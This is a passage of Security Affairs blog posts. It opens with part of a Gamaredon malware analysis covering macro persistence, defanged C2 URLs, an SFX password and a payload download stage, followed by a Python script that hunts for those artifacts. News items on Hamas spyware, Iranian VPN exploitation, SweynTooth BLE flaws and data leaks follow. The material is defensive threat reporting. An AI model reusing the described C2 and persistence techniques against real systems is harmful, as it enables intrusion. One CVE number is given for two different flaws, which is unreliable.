  • The first one sets the registry key “HKEY_CURRENT_USER\Software\Microsoft\Office\” & Application.Version & _”\Word\Security\” and declares some other variables, such as the drop URL “get-icons.]ddns.net”;
  • The second one sets up the persistence mechanism by writing VBS code to the Startup folder under the name “templates.vbs”. This VBS is, properly speaking, the macro executed by Word’s macro engine.

Figure 4. Code of the “template.vbs” stored in the Startup folder

The evidence of the written file in the Startup folder:

Figure 5. Evidence of the “template.vbs” file in the Startup folder

Analyzing the content of “templates.vbs”, it is possible to notice that it defines a variable containing a URL such as “hxxp://get-icons.]ddns.]net/ADMIN-PC_E42CAF54//autoindex.]php”, obtained from “hxxp://get-icons.]ddns.]net/” & NlnQCJG & “_” & uRDEJCn & “//autoindex.]php”, where “NlnQCJG” is the name that identifies the computer on the network and “uRDEJCn” is the drive serial number in hexadecimal encoding. From this URL it tries to download another stage, storing it in the “C:\Users\admin\AppData\Roaming\” path with a random name. At the end, the “templates.vbs” script forces the machine to reboot.

Figure 6. Function used to force machine reboot

The dropped sample is an SFX archive, as is traditional for Gamaredon implants.

Hash: c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f
Threat: Gamaredon Pteranodon implant SFX archive
Brief Description: SFX Archive First Stage
Ssdeep: 24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv:zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv

Table 3. Information about first SFX archive

By simply opening the SFX archive, it is possible to notice two different files, shown below and named respectively “8957.cmd” and “28847”.

Figure 7. Content of the Gamaredon Pteranodon  SFX archive

When executed, the SFX archive will be extracted and the “8957.cmd” will be run. The batch script looks like the following screen:

Figure 8. Bat script source code (with junk instructions)

It contains several junk instructions in an attempt to make the analysis harder. Cleaning the script, we obtain:

Figure 9. Batch script source code (cleaned)

At this point, the batch script renames the “28847” file to “28847.exe”, opens it using “pfljk,fkbcerbgblfhs” as the password, and the file contained inside “28847.exe” is renamed to “WuaucltIC.exe”. Finally, it is run with “-post.php” as argument.

The fact that “28847.exe” can be opened this way tells us that the “28847” file is another SFX archive. Some static information about it:

Hash: 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1
Threat: Gamaredon Pteranodon implant SFX archive
Brief Description: SFX Archive Second Stage
Ssdeep: 24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM:OoZwxVvfoaPu

Table 4. Information about the second SFX archive

Exploring it, it is possible to see several files inside, among them the “6323” file. The following figure shows the complete list.

Figure 10. Content of the second SFX archive

In this case, the SFX archive contains 8 files: five of them are legitimate DLLs used by the “6323” executable to interoperate with the OLE format defined and used by Microsoft Office. The “ExcelMyMacros.txt” and “wordMacros.txt” files contain further macro scripts, described next. Static analysis of the “6323” file reveals its nature: it is written with Microsoft Visual Studio .NET and is therefore easy to reverse. Before reversing the executable, it can be cleaned, reducing both its size and the junk instructions inside the code. The image below shows information about the sample before and after the cleaning.

Figure 11. Static information about .NET sample before and after the cleaning

The source code looks as follows. 

Figure 12. Part of .NET sample source code

The first check performed is on the arguments: if the argument count is zero, the malware terminates. After that, the malware checks for the existence of the files "ExcelMyMacros.txt" and "wordMacros.txt" in the same path where it is executed: if they exist it reads their contents, otherwise it exits.

Figure 13. Function used by the .NET sample to check the presence of the "WordMacros.txt" and "ExcelMyMacros.txt" files

Part of the content of the variable “xVGlMEP”:

Figure 14. Piece of the "WordMacros.txt" code

There is only a slight difference between the two files.

Figure 15. Difference between the "WordMacros.txt" and "ExcelMyMacros.txt" files

As visible in the previous figure, the only differences between the files are the variable names, registry key and path used by Word rather than by Excel. Finally, the macros are executed using the Office engine, as in the following figure.

Figure 16. Winword with malicious macro

So let’s start dissecting the macros. For clarity we will consider only one macro, the one contained in "wordMacros.txt". First of all, the macro sets the registry key "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & _"\Word\Security\" and then sets up two scheduled tasks that start every 12 and 15 minutes respectively: the first one runs "IndexOffice.vbs" from the path "%APPDATA%\Microsoft\Office\" and the second one runs "IndexOffice.exe" from the same path.

Figure 17. Registry keys and Scheduled tasks set by malware

Finally, the malware writes the "IndexOffice.txt" file to the "%APPDATA%\Microsoft\Office\" path. The following figure shows what has just been described:

Figure 18. Part of “IndexOffice.txt” file

The script checks for the presence of the "IndexOffice.exe" artifact: if it exists, the script deletes it and downloads a new file/script from "hxxp://masseffect.]space/<PC_Name>_<Hex_Drive_SN>/post.]php".

Figure 19. Domain “masseffect.]space” declaration and use of the Encode function

The malware tries to save the C2 response and to encode it using the Encode function. This function accepts three parameters: the input file, the output file and the arrKey; arrKey is computed by the GetKey function, which takes as input the hexadecimal value of the serial number of the drive installed on the machine and returns the key. Part of the Encode function and the complete code of the GetKey function are shown below.

Figure 20. Encode function 
Figure 21. Function GetKey

Visiting the C2 web page returns a "Forbidden" message, which means that the domain is still active but refuses incoming requests.

Figure 22. Browser view of the URL “masseffect.]space” 
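The persistence and beaconing behaviour described above gives a defender three host- and network-side artifacts to hunt for: scheduled tasks that run "IndexOffice.vbs" or "IndexOffice.exe" from "%APPDATA%\Microsoft\Office\", Office processes writing the "Word\Security" (or "Excel\Security") key under HKEY_CURRENT_USER, and HTTP requests whose path follows the "<PC_Name>_<Hex_Drive_SN>/post.php" pattern. The following Python is an added example, not code from the Cybaze-Yoroi report or from the Security Affairs post; the task, registry and proxy records it runs over are constructed to look like an endpoint export and a proxy log, and the C2 hostname in them is a placeholder rather than the real domain.

```python
"""Hunt for the Gamaredon/Pterodon persistence artifacts described in the analysis.

Added example; the records below are constructed sample data, not real telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Task action that launches IndexOffice.vbs / IndexOffice.exe from the Office
# folder under %APPDATA% (either the variable or its expanded Roaming path).
INDEXOFFICE_ACTION = re.compile(
    r"(?:%APPDATA%|AppData\\Roaming)\\Microsoft\\Office\\IndexOffice\.(?:vbs|exe)\b",
    re.IGNORECASE,
)

# Registry key the macro writes: HKCU\Software\Microsoft\Office\<ver>\Word\Security
# (the Excel variant differs only in the application name).
OFFICE_SECURITY_KEY = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\[\d.]+\\(?:Word|Excel)\\Security$",
    re.IGNORECASE,
)

# Beacon URL shape: http(s)://<host>/<PC_Name>_<Hex_Drive_SN>/post.php
BEACON_URL = re.compile(
    r"https?://[^\s/]+/[A-Za-z0-9.-]+_[0-9A-Fa-f]{4,}/post\.php\b"
)


@dataclass
class TaskRecord:
    name: str
    action: str          # command line the scheduled task executes
    interval_min: int    # repetition interval in minutes


@dataclass
class RegistryWrite:
    process: str         # image name of the writing process
    key: str             # full registry key path


def suspicious_tasks(tasks: List[TaskRecord]) -> List[Tuple[str, int]]:
    """Return (task name, interval) for tasks launching IndexOffice.* from %APPDATA%."""
    return [(t.name, t.interval_min) for t in tasks if INDEXOFFICE_ACTION.search(t.action)]


def office_security_key_writes(writes: List[RegistryWrite]) -> List[str]:
    """Return Office security keys written by Word or Excel (the macro's behaviour)."""
    office_images = {"winword.exe", "excel.exe"}
    return [
        w.key for w in writes
        if w.process.lower() in office_images and OFFICE_SECURITY_KEY.match(w.key)
    ]


def beacon_requests(proxy_lines: List[str]) -> List[str]:
    """Return proxy log lines whose URL matches the <PC_Name>_<Hex_SN>/post.php pattern."""
    return [line for line in proxy_lines if BEACON_URL.search(line)]


def hunt(tasks, writes, proxy_lines) -> Dict[str, list]:
    """Combine the three checks into one report."""
    return {
        "tasks": suspicious_tasks(tasks),
        "registry": office_security_key_writes(writes),
        "beacons": beacon_requests(proxy_lines),
    }


# ---- constructed sample data (not real telemetry) ----
SAMPLE_TASKS = [
    TaskRecord(r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
               r"%SystemRoot%\system32\usoclient.exe StartScan", 60),
    TaskRecord("IndexOffice", r'wscript.exe "%APPDATA%\Microsoft\Office\IndexOffice.vbs"', 12),
    TaskRecord("IndexOfficeExe", r'"C:\Users\user\AppData\Roaming\Microsoft\Office\IndexOffice.exe"', 15),
    TaskRecord("OneDrive Standalone Update",
               r"%LOCALAPPDATA%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe", 1440),
]
SAMPLE_REG = [
    RegistryWrite("winword.exe", r"HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security"),
    RegistryWrite("explorer.exe", r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer"),
    RegistryWrite("excel.exe", r"HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options"),
]
SAMPLE_PROXY = [
    "2020-02-17T10:00:01Z 10.0.0.5 GET http://cdn.example.test/static/app.js 200",
    "2020-02-17T10:12:03Z 10.0.0.5 GET http://c2-placeholder.invalid/DESKTOP-AB12CD_1A2B3C4D/post.php 403",
    "2020-02-17T10:27:05Z 10.0.0.5 POST http://c2-placeholder.invalid/DESKTOP-AB12CD_1A2B3C4D/post.php 403",
    "2020-02-17T10:30:00Z 10.0.0.5 GET http://mail.example.test/owa/post.php 200",
]

if __name__ == "__main__":
    for section, hits in hunt(SAMPLE_TASKS, SAMPLE_REG, SAMPLE_PROXY).items():
        print(section, hits)
```

The 12- and 15-minute intervals are reported alongside the task names rather than used as a filter, because the scheduled interval is the easiest thing for an operator to change while the "%APPDATA%\Microsoft\Office\IndexOffice.*" path and the "Word\Security" key are the behaviours the macro relies on. The 403 responses in the sample mirror the "Forbidden" answer the analysts saw from the C2: a refused beacon is still a beacon worth alerting on.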

Conclusion

Gamaredon cyberwarfare operations against Ukraine are still active. This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years. 

The massive use of weaponized Office documents, Office template injection, SFX archives, WMI and several VBA macro stages that change dynamically makes the Pterodon attack chain very malleable and adaptive. However, the introduction of a .NET component is a novelty compared to previous Pterodon samples.

Further technical details, including Indicators of Compromise and Yara rules, are reported in the analysis published by the experts at the Cybaze-Yoroi ZLAB.

Pierluigi Paganini

(SecurityAffairs – hacking, Gamaredon)

The post Cyberwarfare: A deep dive into the latest Gamaredon Espionage Campaign appeared first on Security Affairs.

IDF soldiers tricked into installing malicious apps by Hamas operatives posing as attractive women

The Israel Defense Forces (IDF) announced it has thwarted an attempt by the Hamas militant group to hack soldiers’ phones by posing as attractive women on social media.

The Israel Defense Forces (IDF) announced it has thwarted an attempt by the Hamas militant group to hack soldiers’ mobile devices by posing as attractive women on social media and instant messaging apps (i.e. Facebook, Instagram, and Telegram). The military has identified at least six social media accounts that were used by attackers to trick the victims into installing malicious apps.

The accounts were named Sarah Orlova, Maria Jacobova, Eden Ben Ezra, Noa Danon, Yael Azoulay, and Rebecca Aboxis, respectively.

Hackers infected dozens of soldiers in recent months, but the IDF declared that it had detected the attack, locked out the malware and taken down the attackers’ infrastructure. Lt. Col. Jonathan Conricus declared that the attackers were not able to steal confidential information from the victims.

“We do not assess there is any significant breach of information,” said Lt. Col. Jonathan Conricus.

This kind of social engineering attack was already used by Hamas hackers in the past: in July 2018 Israeli military intelligence accused Hamas operatives of creating tainted apps to lure soldiers into downloading spyware onto their phones. At the time, Hamas operatives created a number of fake Facebook profiles using photos of attractive women to lure IDF soldiers into private conversations, then attempted to trick them into installing one of the compromised apps.

Israeli military officials explained that Hamas operatives adopted the same tactic in a campaign launched in January 2018, when the hackers used the profile of a woman named “Elianna Amer.”

However, IDF experts explained that the latest campaign was by far the most sophisticated.

“We see that the level of social engineering is much higher and much more advanced and sophisticated when compared to previous attempts done by Hamas,” Conricus added. “We see that they’re of course learning and upping their game.”

The “women” claimed to be new immigrants to explain their poor Hebrew; in some cases, they also claimed to be deaf to trick the soldiers into texting instead of speaking directly on the phone.

The photos used for the profiles employed in the attacks were disguised to make it difficult to “reverse track” them.

IDF experts noticed that attackers send links to the soldiers asking them to download a Snapchat-like app to exchange private photos that could quickly disappear. The links were pointing to three malicious applications (Catch&See, ZatuApp, and GrixyApp) that allowed Hamas attackers to compromise the target phones.

Once installed, the apps show a crash notification and then delete their icons from the soldiers’ phones to trick them into thinking that the app was uninstalled.

In reality, the apps run in the background and allow attackers to control the victims’ phones: they could be used to exfiltrate sensitive data from the devices (i.e. photos, SMS messages, contacts, and more), install other malware on the device, track the phone’s geo-location in real time, and activate the phone’s camera.

Pierluigi Paganini

(SecurityAffairs – IDF, Hamas)



The post IDF soldiers tricked into installing malicious apps by Hamas operatives posing as attractive women appeared first on Security Affairs.

Fox Kitten Campaign – Iranian hackers exploit 1-day VPN flaws in attacks

Iranian hackers have been hacking VPN servers to plant backdoors in companies around the world

Iran-linked attackers targeted Pulse Secure, Fortinet, Palo Alto Networks, and Citrix VPNs to hack into large companies as part of the Fox Kitten Campaign.

During the last quarter of 2019, experts from security firm ClearSky uncovered a hacking campaign, tracked as the Fox Kitten Campaign, that has been conducted over the last three years.

The campaign targeted dozens of companies and organizations in Israel and around the world; experts pointed out that the most successful and significant attack vector used by the Iranian hackers was the exploitation of unpatched VPN and RDP services.

Iran-linked hackers have targeted companies from different sectors, including IT, Telecommunication, Oil and Gas, Aviation, Government, and Security.

“This attack vector is not used exclusively by the Iranian APT groups; it became the main attack vector for cybercrime groups, ransomware attacks, and other state-sponsored offensive groups.” reads the report published by ClearSky.

“We assess this attack vector to be significant also in 2020 apparently by exploiting new vulnerabilities in VPNs and other remote systems (such as the latest one existing in Citrix). Iranian APT groups have developed good technical offensive capabilities and are able to exploit 1-day vulnerabilities in relatively short periods of time, starting from several hours to a week or two.”

Experts explained that Iranian hackers have focused on 1-day flaws and developed a significant capability to build working exploits for them, which were then employed in their operations.

ClearSky confirms that Iranian APT groups in some cases exploited VPN vulnerabilities within hours after their public disclosure.

The investigation into the Fox Kitten Campaign revealed an overlap, with medium-high probability, between the infrastructure used by the attackers and the one associated with attacks carried out by other Iran-linked APT groups, such as APT34, APT33, and APT39.

In 2019, Iran-linked APT groups were able to quickly exploit the vulnerabilities in the Pulse Secure “Connect” VPN (CVE-2019-11510), the Fortinet FortiOS VPN (CVE-2018-13379), and Palo Alto Networks “Global Protect” VPN (CVE-2019-1579).

The attacks exploiting the above issues were initially detected at the end of August; more recently, Iran-linked hackers also employed exploits for the CVE-2019-19781 Citrix “ADC” VPN flaw in their attacks.

Attackers exploit the VPN flaws to access the enterprise networks, infect systems with a backdoor and, from there, move laterally to compromise other computers on the internal network.

After the attackers have exploited vulnerabilities in the VPN systems to breach the target network, they perform several actions and use multiple tools to maintain their foothold in the network with high privileges.

The list of privilege escalation tools used by the hackers includes Juicy Potato, Procdump, Mimikatz, and Sticky Keys.

The threat actors also used legitimate software like Putty, Plink, Ngrok, Serveo, or FRP in their attacks.

ClearSky also reported the use of the following custom-made malware:

  • STSRCheck – Self-developed databases and open ports mapping tool.
  • POWSSHNET – Self-Developed Backdoor malware – RDP over SSH Tunneling.
  • VBScript – download TXT files from the command-and-control (C2 or C&C) server and unify these files to a portable executable file.
  • Socket-based backdoor over cs.exe – An exe file used to open a socket-based connection to a hardcoded IP address.
  • Port.exe – tool to scan predefined ports on an IP address.

The attacks that are part of the Fox Kitten Campaign observed by ClearSky aimed to gather information on the target networks and plant backdoors, but experts fear that once inside the target infrastructure the hackers could use data wipers (i.e. ZeroCleare and Dustman) in future attacks.

Further technical details on the Fox Kitten Campaign, including indicators of compromise (IOCs), are reported in the analysis published by ClearSky.

Pierluigi Paganini

(SecurityAffairs – Fox Kitten campaign, VPN)

The post Fox Kitten Campaign – Iranian hackers exploit 1-day VPN flaws in attacks appeared first on Security Affairs.

US administration requests $9.8B for cyber 2021 budget for the Department of Defense

The US administration requested $9.8 billion for cyber in next year’s budget for the Department of Defense, the amount is the same as last year.

The US administration requested $9.8 billion for cyber operations in next year’s budget for the Department of Defense, a figure that confirms the strategic importance of the fifth domain of warfare for the US Government.

The amount requested for cyber operations in the “DOD Releases Fiscal Year 2021 Budget Proposal” document is nearly the same as the amount requested last year for the operations the US military will conduct in 2020.

The budget was released on February 10, it requests $9.8 billion for fiscal year 2021 on cyber activities, while the previous budget was about $9.6 billion in the fiscal year 2020.

The investments of the US administration in the Cyberspace Domain ($9.8 billion) include:

  • Cybersecurity – $5.4 billion
  • Cyberspace Operations – $3.8 billion
  • Cyberspace Science and Technology – $556 million

In addition to the $9.8 billion, the budget funds:

  • Artificial Intelligence – $841 million
  • Cloud – $789 million


Below the details for every single item:

♦ $5.4 billion for cybersecurity – The $5.4 billion Cybersecurity budget aims at increasing capabilities in Cross Domain Solutions, Next-Generation Encryption Solutions, and Network Modernizations. It aims at reducing the risk of cyber attacks on networks, systems, and information. The budget includes:

  • $678 million for cryptology modernization and next-generation platforms;
  • $296.2 million for securing points of information and sharing;
  • $198.5 million for Operationalizing Identity and Credential Access Management (ICAM) modernization;
  • $67.2 million for Comply to Connect (C2C) and Automated Continuous Endpoint Monitoring (ACEM);
  • $69.8 million for critical infrastructure.

♦ $3.8 billion for operations. This investment would cover offensive and defensive operations and support the implementation of the Cyber Strategy by funding programs and activities. The budget includes:

  • $431.6 M for Cooperation with allies and partners in the conduct of “hunt forward” defensive cyberspace operations to counter malign cyber actors.
  • $238.6 M for the development of capabilities to integrate joint, coalition and inter-agency command and control to enhance multi-domain operations.
  • $460.4 M for mission assurance activities that allow the Department to better understand the risks to its key missions and to increase resilience and implement mitigations to reduce the vulnerability of key assets.

The document includes another $2.2 billion to support the Cyber Mission Forces.

DoD Budget Request is available here.

Pierluigi Paganini

(SecurityAffairs – Department of Defense, hacking)

The post US administration requests $9.8B for cyber 2021 budget for the Department of Defense appeared first on Security Affairs.

Organizers of major hacking conferences in Asia put them on hold due to Coronavirus outbreak

Organizers of Black Hat Asia and DEF CON China security conferences announced that they put the events on hold due to the Coronavirus outbreak.

Bad news for cybersecurity enthusiasts and experts: the organizers of the Black Hat Asia and DEF CON China security conferences announced last week that they have put the events on hold due to the Coronavirus outbreak.

The announcements come after the organizers of another important tech event, the Mobile World Congress (MWC) in Barcelona, announced that the meeting has been canceled due to the Coronavirus outbreak.

The organizers of the Black Hat Asia conference announced that they have decided to postpone the event to the fall of this year to protect the health and safety of the attendees.

“After careful consideration of the health and safety of our attendees and partners, we have made the difficult decision to postpone Black Hat Asia 2020 due to the coronavirus outbreak. We understand the inconvenience this may cause and will follow up directly with all of those who are scheduled to attend and exhibit to determine appropriate next steps.” reads the notice published on the official website of the conference.

“Please know we are planning to host Black Hat Asia 2020 in the fall this year.”

The event was scheduled from March 31 to April 3 at Marina Bay Sands in Singapore, where authorities raised the risk assessment to DORSCON Orange, which means that the disease is severe and spreads easily from person to person.

It is not clear if the organizers will refund people that bought the tickets and will not be able to participate in the fall.

Organizers of another important cyber security conference, DEF CON China 2.0 (initially planned between 17-19 April in Beijing), already announced at the end of January the decision to postpone the event due to the coronavirus outbreak.

“In light of global precautions being announced to combat the coronavirus outbreak, we’ve decided to postpone DEF CON China 2.0. We regret inconveniencing any of you. Know that we are committed to holding the event once it’s safe to do so.” reads a post on the event’s forum.

“If you want a refund on purchased tickets, please submit a refund request to your ticket broker. If you’d rather that we hold your reservation for our new dates, you don’t have to do anything and we’ll keep your tickets on file.”

The organizers accept refund requests from participants that have bought the tickets for the event.

Pierluigi Paganini

(SecurityAffairs – Coronavirus outbreak, hacking)

The post Organizers of major hacking conferences in Asia put them on hold due to Coronavirus outbreak appeared first on Security Affairs.

Security Affairs newsletter Round 251

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Maastricht University finally paid a 30 bitcoin ransom to crooks
Massive DDoS attack brought down 25% Iranian Internet connectivity
The number of cyber attacks on Saudi Aramco is increasing
1.2 million CPR numbers for Danish citizen leaked through tax service
A cyber-attack on major banks could trigger a liquidity crisis, ECB President Christine Lagarde warns
A sad story of pedophilia on how disgusting images fed the web
Chinese Military personnel charged with hacking into credit reporting agency Equifax
Malaysia’s MyCERT warns cyber espionage campaign carried out by APT40
Netanyahu’s party Elector app exposes data on over 6.5M Israelis
Adobe addresses 42 flaws in its five products
Dell SupportAssist flaw exposes computers to hack, patch it asap!
OT attacks increased by over 2000 percent in 2019, IBM reports
Safer internet day – Cybercrime facts Infographic
South Korean Woori Bank is accused of unauthorized use of customer data
The Altsbit exchange will exit in May following a hack
440M records found online in unprotected database belonging to Estée Lauder
Crypto AG was spied for US, German intelligence agencies for decades
Microsoft Patch Tuesday updates for February 2020 fix IE 0day flaw
Reading the 2019 Internet Crime Complaint Center (IC3) report
Siemens fixed multiple DoS flaws in several products
600+ installs of WordPress Cookie Consent Plugin vulnerable to hack. Fix it now!
Google Play Protect prevented 1.9 billion malware installs from Third-party stores in 2019
Microsoft recommends Exchange admins to disable the SMBv1 protocol
MoleRATs APT group targets Palestinian territories
Three Italian universities hacked by LulzSec_ITA collective
US officials claim Huawei Equipment has secret backdoor for spying
Helix Bitcoin Mixer operator charged for laundering over $300M worth of Bitcoin
Nedbank client data compromised in security breach at third-party provider
PoS malware infected systems at 71 locations operated by US store chain Rutters
Russian watchdog fines Twitter, Facebook for not moving user data to local servers
US Govt agencies detail North Korea-linked HIDDEN COBRA malware
NextMotion plastic surgery tech firm data leak
SweynTooth Bluetooth flaws affect devices from major system-on-a-chip (SoC) vendors
The cyber attack against Austria’s foreign ministry has ended

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 251 appeared first on Security Affairs.

IOTA cryptocurrency shuts down entire network after a coordinated attack on its Trinity wallet

The IOTA Foundation, the organization behind the IOTA cryptocurrency, was forced to shut down its entire network following a cyber attack that resulted in the theft of funds.

Hackers have exploited a vulnerability in the official IOTA wallet to steal funds from the users. In response to the incident, the IOTA Foundation, the nonprofit organization behind the IOTA cryptocurrency, has decided to take down its entire network.

The attack took place on February 12, 2020, the incident was confirmed via Twitter by the foundation:

The foundation also published details about the incident on its website, explaining that it decided to shut down the “Coordinator” node a few minutes after it became aware of the fraudulent transactions.


The Coordinator is a node of the IOTA network that is involved in the final approval of any IOTA currency transactions.

The measure was adopted to prevent hackers from stealing additional funds. According to the foundation, the perpetrator targeted high-value accounts first, before moving on to smaller accounts, and was then interrupted early by the halt of the coordinator.

“The attack pattern analysis showed that the halt of the coordinator interrupted the attacker’s attempts to liquidate funds on exchanges.” reads the post published by the foundation. “The stolen funds have been purposely and repeatedly merged and split to obfuscate the investigation, and with the current token exchange rate as well as exchanges’ KYC limits in mind. We received additional feedback from more exchanges (not all yet), confirming that none of the identified transactions has been received or liquidated.”

At the time of publishing this post, the IOTA network is still down and an investigation is ongoing.

IOTA members along with external cyber security experts that have joined the investigation discovered that hackers exploited a dependency of the Trinity wallet app.

“We have found the exploit and are now working on resolving the issue. As expected, the exploit is related to the (user-facing) Trinity Wallet. The IOTA core protocol is – as already communicated before – not breached.” continues the post.

The IOTA Foundation has not disclosed the total value of the stolen funds, but experts believe it could be more than $1 million worth of IOTA coins.

Pierluigi Paganini

(SecurityAffairs – hacking, IOTA foundation)

The post IOTA cryptocurrency shuts down entire network after a coordinated attack on its Trinity wallet appeared first on Security Affairs.

NextMotion plastic surgery tech firm data leak

Photos and personal information belonging to patients of the NextMotion plastic surgery tech firm have been exposed online through an unsecured S3 bucket.

Hundreds of thousands of documents containing photos and personal information belonging to patients of the plastic surgery technology company NextMotion have been exposed online through an unsecured Amazon Web Services (AWS) S3 bucket.

NextMotion is a French plastic surgery tech company that provides imaging and patient management software that allows clinics to keep complete treatment records for aesthetic patients.

The software is able to create before and after pictures and videos of patients during the treatment process.

“Nextmotion is an ecosystem based on a medical cloud that allows you to sort, store and access your data wherever you are,” states the company on its website.

“In that sense, all your data is covered with the highest requested security level as it is hosted in France on servers authorized by the Haute Autorité de Santé (French Health Authority) – in our case, AWS who is certified.”

The S3 bucket contained approximately 900,000 files, including highly sensitive patient images and videos, as well as plastic surgery and consultation documents.

“The compromised database contained 100,000s of profile images of patients, uploaded via NextMotion’s proprietary software. These were highly sensitive, including images of patients’ faces and specific areas of their bodies being treated.” reads the post published by vpnMentor. “Our team had access to almost 900,000 individual files. These included highly sensitive images, video files, and paperwork relating to plastic surgery, dermatological treatments, and consultations performed by clinics using NextMotion’s technology.”

The patients’ personal information viewed by the experts included invoices for treatments, outlines for proposed treatments, video files (including 360-degree body and face scans), and profile photos of the patients (both facial and body).

According to NextMotion, patient data stored in the unsecured database “had been de-identified,” but vpnMentor experts pointed out that paperwork and invoices leaked also contained Personally Identifiable Information (PII) data of patients.

“We were informed on January 27, 2020, that a cybersecurity company had undertaken tests on randomly selected companies and had managed to access our information system.” reads the notice published by the company. “They were able to access and extract medias (videos and photos) from some of our patients’ files. Those media were on a specific database separated from patient’s text database (names, birth dates, notes, etc) – only the media database was exposed, patient’s database was not exposed.”

Experts explained that the type of data leaked online can be abused to target patients in a wide range of malicious activities, including scams, fraud, phishing and other attacks.

NextMotion pointed out that it has immediately implemented corrective measures to protect its customers.

Below the timeline of the discovery of the data leak:

  • Date discovered: 24/01
  • Date vendors contacted: 27/01
  • Date of contact with AWS: 30/01
  • Date of Action: 5/02
  • Date of Reply: 11/02

In October 2017, another incident affected plastic surgery patients. The celebrity-frequented London Bridge Plastic Surgery clinic confirmed in a statement that it was the victim of a cyber attack; the alleged culprit is a well-known hacker who goes online by the moniker The Dark Overlord.

Pierluigi Paganini

(SecurityAffairs – NextMotion, data leak)

The post NextMotion plastic surgery tech firm data leak appeared first on Security Affairs.

SweynTooth Bluetooth flaws affect devices from major system-on-a-chip (SoC) vendors

Security experts have discovered multiple flaws, dubbed SweynTooth, in the Bluetooth Low Energy (BLE) implementations of major system-on-a-chip (SoC) vendors.

A group of researchers has discovered multiple vulnerabilities, tracked as SweynTooth, in the Bluetooth Low Energy (BLE) implementations of major system-on-a-chip (SoC) vendors.

The group was composed of researchers Matheus E. Garbelini, Sudipta Chattopadhyay, and Chundong Wang from the Singapore University of Technology and Design.

The Bluetooth Low Energy (BLE) protocol was released in 2010 and is designed to enable a new generation of services for mobile applications. The protocol specifically addresses the power consumption of such applications, aiming to reduce battery drain on devices that transmit signals constantly.

Now experts have found 12 vulnerabilities in the BLE software development kits (SDKs) of seven SoC vendors (Texas Instruments, NXP, Cypress, Dialog Semiconductors, Microchip, STMicroelectronics and Telink Semiconductor) that could be exploited to hack into various smart devices, including environmental tracking or sensing systems.

Experts revealed that they have also identified several medical and logistics products that could be affected by the SweynTooth flaws.

The researchers already reported the flaws to the vendors, and most of them have already addressed the issues.

“SweynTooth captures a family of 12 vulnerabilities (more under non-disclosure) across different BLE software development kits (SDKs) of seven major system-on-a-chip (SoC) vendors.” reads the analysis published by the researchers. “The vulnerabilities expose flaws in specific BLE SoC implementations that allow an attacker in radio range to trigger deadlocks, crashes and buffer overflows or completely bypass security depending on the circumstances.”

Experts confirmed that more issues are still under disclosure, that the list of impacted SoC vendors is longer, and that the many IoT products built on top of the vulnerable SoCs still need independent patches from their respective vendors.

“SweynTooth highlights concrete flaws in the BLE stack certification process. We envision substantial amendments to the BLE stack certification to avoid SweynTooth style security flaws. We also urge SoC vendors and IoT product manufacturers to be aware of such security issues and to initiate focused effort in security testing.” continue the experts.

Experts classified the SweynTooth flaws according to their types and their behaviours on the vulnerable devices, below the classes defined by the experts:

  • Crash: Vulnerabilities that remotely trigger hard faults forcing the device crash. Typically, these issues trigger memory corruption, such as a buffer overflow on BLE reception buffer.
  • Deadlock: Vulnerabilities that affect the availability of the BLE connection without causing a hard fault or memory corruption. These issues usually occur due to some improper synchronization between user code and the SDK firmware distributed by the SoC vendor.
  • Security Bypass: Vulnerabilities that could be exploited by attackers in radio range to bypass the latest secure pairing mode of BLE. These issues are particularly dangerous because an attacker in the radio range has arbitrary read or write access to device’s functions.

“The exploitation of the vulnerabilities translates to dangerous attack vectors against many IoT products released in 2018-2019. At first glance, most of the vulnerabilities affect product’s availability by allowing them to be remotely restarted, deadlocked or having their security bypassed.” continue the experts.

Making a quick search on the Bluetooth Listing Search site, experts discovered that around 480 product listings employ the affected SoCs, each of them containing several products.

A vulnerability named Link Layer Length Overflow impacts Cypress PSoC4/6 BLE Component 3.41/2.60 (CVE-2019-16336) and NXP KW41Z 3.40 SDK (CVE-2019-17519). The issue initially causes denial of service (DoS), but “attackers could reverse engineer products firmware to possibly leverage remote execution,” the researchers say.

Below the list of the flaws:

  • Link Layer LLID deadlock flaws, deadlock issues that affect Cypress (CVE-2019-17061) and NXP devices (CVE-2019-17060). The issues impact the BLE communication between devices.
  • Truncated L2CAP (CVE-2019-17517) flaw, a crash issue that affects Dialog DA14580 devices running SDK 5.0.4 or earlier. The issue could trigger a DoS condition causing the crash of the device, the same as Silent Length Overflow (CVE-2019-17518), which affects Dialog DA14680 devices.
  • Invalid Connection Request (CVE-2019-19195), a DoS issue that affects the Texas Instruments CC2640R2 BLE-STACK and CC2540 SDKs. A similar issue is the Unexpected Public Key Crash (CVE-2019-17520), which affects the Texas Instruments CC2640R2 BLE-STACK-SDK and could lead to DoS and product restarts.
  • Sequential ATT Deadlock (CVE-2019-19192), a deadlock issue that affects STMicroelectronics WB55 SDK V1.3.0 and earlier. Invalid L2CAP fragment (CVE-2019-19195) that could be exploited by a remote attacker to restart running Microchip ATMSAMB11 BluSDK Smart v6.2 and earlier.
  • The Key Size Overflow vulnerability (CVE-2019-19196), a crash issue that impacts all Telink Semiconductor BLE SDKs.
  • The security bypass flaw (CVE-2019-19194) in products using the Telink SMP implementation, which could be abused to completely bypass security in BLE products.

Below two video PoCs published by the experts that show the exploitations of the issues in some products:

At the time of the report, Dialog, Microchip and STMicroelectronics had yet to release patches to address the flaws in the affected products.

